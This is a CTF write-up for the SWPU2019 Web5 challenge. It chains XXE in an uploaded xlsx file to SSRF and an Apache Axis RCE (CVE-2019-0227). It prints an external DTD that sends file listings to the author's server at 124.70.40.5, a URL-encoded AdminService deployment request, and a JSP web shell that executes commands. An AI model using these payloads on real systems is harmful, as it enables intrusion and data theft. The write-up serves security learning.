fmyyy

SWPU2019-Web5

  • 2022-01-25
  • 作者 fmyyy
  • ~3.92K 字
  1. 1. [SWPU2019]Web5

[SWPU2019]Web5

题目给了个导入导出通讯录的功能,导出为xlsx文件,所以猜测是解析excel引起的xxe

验证一下

对[Content_Types].xml写入poc之后再压缩回去

1
2
3
4
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANYTHING [
<!ENTITY % test SYSTEM "http://124.70.40.5:1234">
%test;

1643111589126.png

验证了xxe存在.无法直接读flag,利用java的file协议列目录,没回显的xxe。

1
2
3
4
5
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
    <!ENTITY % fmyyy SYSTEM "http://124.70.40.5/evil.dtd">
%fmyyy;
]>

evil.dtd内容

1
2
3
4
<!ENTITY % file SYSTEM "file:ctffffff/backups">
<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://124.70.40.5:1234/?%file;'> ">
%dtd;
%xxe;

1643114264023.png

看到备份目录,下载。/ctffffff/backups/backup-af7f385c8840f173779124df915b6ebb.zip

1643116574890.png

读web.xml看到注册了FlagServlet,但没有权限读/flag

1643116937583.png

1643116984648.png

看到axis,查看其版本信息

1643116611282.png

该版本正好有个RCE

CVE-2019-0227

https://paper.seebug.org/1489/#141-rceservicehandler

这里的post请求包无法打通,因为这洞有前提条件,但xxe可以进行ssrf,尝试get的请求,用文章里第一个就行,路径得改成axis/shell.jsp

1
2
3
4
5
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
    <!ENTITY % fmyyy SYSTEM "http://127.0.0.1:8080/axis/services/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22randomBBB%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22..%2Fwebapps%2Faxis%2Fshell.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment">
%fmyyy;
]>

1643118531514.png

访问看见服务成功开启

然后post /axis/services/randomBBB(这里路径对应上面开启的服务名)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
POST /axis/services/randomBBB HTTP/1.1
Host: 19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml
SOAPAction: something
Content-Length: 874
Origin: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
Connection: close
Referer: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81/axis/services/AdminService
Cookie: __gads=ID=df4db7075da356b3-22a4b6a235c800b4:T=1620812094:RT=1620812094:S=ALNI_MbStkXgvBJ8Ws8Umu-eWCgWwB0rTw; UM_distinctid=17cb52e2bac47c-0b11a0162b7f1d-455e6d-1fa400-17cb52e2bad4d8
Upgrade-Insecure-Requests: 1

<?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Body>
        <api:main
        soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
            </api:in0>
        </api:main>
  </soapenv:Body>
</soapenv:Envelope>

1643119208454.png

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
最后编辑:2022-01-26